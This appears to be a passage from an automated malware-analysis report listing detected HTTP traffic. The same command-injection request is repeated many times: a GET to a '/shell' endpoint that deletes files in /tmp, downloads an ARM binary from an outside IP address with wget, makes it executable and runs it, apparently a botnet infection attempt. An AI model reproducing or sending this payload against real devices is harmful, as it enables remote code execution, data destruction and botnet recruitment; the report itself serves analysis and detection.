              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+45.95.168.143/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+45.95.168.143/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+45.95.168.143/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+45.95.168.143/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+45.95.168.143/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+45.95.168.143/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+45.95.168.143/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+45.95.168.143/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+45.95.168.143/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+45.95.168.143/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+45.95.168.143/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+45.95.168.143/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+45.95.168.143/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+45.95.168.143/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+45.95.168.143/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+45.95.168.143/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+45.95.168.143/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+45.95.168.143/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+45.95.168.143/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+45.95.168.143/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+45.95.168.143/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+45.95.168.143/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+45.95.168.143/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+45.95.168.143/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+45.95.168.143/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+45.95.168.143/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+45.95.168.143/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+45.95.168.143/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+45.95.168.143/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+45.95.168.143/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+45.95.168.143/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+45.95.168.143/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+45.95.168.143/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+45.95.168.143/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+45.95.168.143/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+45.95.168.143/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+45.95.168.143/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+45.95.168.143/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+45.95.168.143/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+45.95.168.143/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+45.95.168.143/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+45.95.168.143/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+45.95.168.143/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+45.95.168.143/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+45.95.168.143/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+45.95.168.143/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+45.95.168.143/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+45.95.168.143/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+45.95.168.143/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+45.95.168.143/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+45.95.168.143/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+45.95.168.143/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+45.95.168.143/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+45.95.168.143/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+45.95.168.143/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+45.95.168.143/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+45.95.168.143/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+45.95.168.143/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+45.95.168.143/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+45.95.168.143/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+45.95.168.143/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+45.95.168.143/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+45.95.168.143/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+45.95.168.143/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+45.95.168.143/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+45.95.168.143/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+45.95.168.143/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+45.95.168.143/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+45.95.168.143/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+45.95.168.143/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+45.95.168.143/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+45.95.168.143/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
